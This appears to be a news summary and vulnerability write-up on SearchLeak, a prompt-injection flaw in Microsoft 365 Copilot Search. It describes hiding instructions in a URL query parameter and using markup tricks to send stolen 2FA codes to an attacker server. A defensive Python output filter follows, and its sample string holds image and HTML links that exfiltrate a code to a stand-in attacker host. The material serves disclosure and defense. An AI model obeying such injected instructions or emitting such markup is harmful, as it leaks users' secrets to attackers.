Varonis Reveals M365 Copilot Exploit That Pulled 2FA Codes After Microsoft Patched Critical Flaw
Updated · Ars Technica · Jun 16
Summary
Varonis said its proof-of-concept exploit could extract 2FA codes and other sensitive email data accessible to M365 Copilot, a week after Microsoft patched the bug.
The attack abused a core LLM weakness: Copilot could not reliably separate legitimate user instructions from malicious commands hidden in third-party content it processed.
To evade guardrails blocking email sends, form submissions and visits to untrusted sites, the researchers used markup and HTML tricks that turned stolen data into web requests captured on an attacker-controlled server.
A key step was a "Parameter-to-Prompt Injection" that hid the malicious instruction in a URL's q query parameter rather than in an email or document, helping the exploit jump Copilot's existing defenses.
The disclosure underscores a broader problem for Microsoft and other LLM providers, which still rely on layered guardrails because the instruction boundary at the heart of prompt injection remains unresolved.
SearchLeak (CVE-2026-42824): Anatomy and Impact of a Critical One-Click Data Theft Vulnerability in Microsoft 365 Copilot Enterprise Search
Overview
Varonis Threat Labs discovered SearchLeak (CVE-2026-42824), a critical vulnerability in Microsoft 365 Copilot Enterprise Search. This flaw exposes a broader risk in LLM-powered enterprise assistants that combine external inputs, like links or prompts, with internal data access and actions. Attackers can send a seemingly legitimate Microsoft link via email or messaging platforms. When the victim clicks the link, it launches Copilot Search with hidden instructions in the URL, allowing prompt injection and unauthorized data retrieval. Any system that allows prompt injection, data retrieval, and output rendering in the same flow could be vulnerable to similar attacks.
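A rendering-side guard for the exfiltration path described above, where markup in the assistant's output turns into a web request to an outside server. This is an added example, not code from Varonis or Microsoft; the allowlisted host, the function names and the sample output are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts the chat renderer may load resources from (placeholder value).
ALLOWED_HOSTS = frozenset({"static.contoso.example"})

MD_INLINE = re.compile(r'!?\[([^\]]*)\]\(\s*<?([^)\s>]+)[^)]*\)')
MD_REFDEF = re.compile(r'^[ \t]*\[[^\]]+\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$', re.M)
HTML_TAG = re.compile(r'<[^>]+>')
HTML_URL = re.compile(r'''\b(?:src|href|action|poster)\s*=\s*["']?([^"'\s>]+)''', re.I)


def is_allowed(url, allowed=ALLOWED_HOSTS):
    """True for relative references and http(s) URLs on an allowlisted host."""
    try:
        parts = urlsplit(url.strip().replace("\\", "/"))
    except ValueError:  # malformed authority, e.g. a broken IPv6 literal
        return False
    if not parts.scheme and not parts.netloc:
        return True  # relative: resolves against the rendering origin
    return parts.scheme in ("http", "https") and (parts.hostname or "").lower() in allowed


def neutralize(text, allowed=ALLOWED_HOSTS):
    """Return (safe_text, blocked_urls) for model output about to be rendered."""
    blocked = []
    def md_inline(m):
        if is_allowed(m.group(2), allowed):
            return m.group(0)
        blocked.append(m.group(2))
        return m.group(1)  # keep only the visible label
    def md_refdef(m):
        if is_allowed(m.group(1), allowed):
            return m.group(0)
        blocked.append(m.group(1))
        return ""  # drop the definition so [label][ref] cannot resolve
    def html_tag(m):
        bad = [u for u in HTML_URL.findall(m.group(0)) if not is_allowed(u, allowed)]
        blocked.extend(bad)
        return "" if bad else m.group(0)
    text = MD_INLINE.sub(md_inline, text)
    text = MD_REFDEF.sub(md_refdef, text)
    return HTML_TAG.sub(html_tag, text), blocked


# Constructed model output (code value and hosts are made up for this example).
SAMPLE = ("Your code is 123456. ![ok](https://collector.attacker.example/p.png?c=123456)\n"
          '<img src="//collector.attacker.example/q?c=123456"> See [help](/help/search).')
```

Logging the returned `blocked_urls` alongside the conversation gives the SOC a signal that an injected instruction reached the output stage even though the request never left the client.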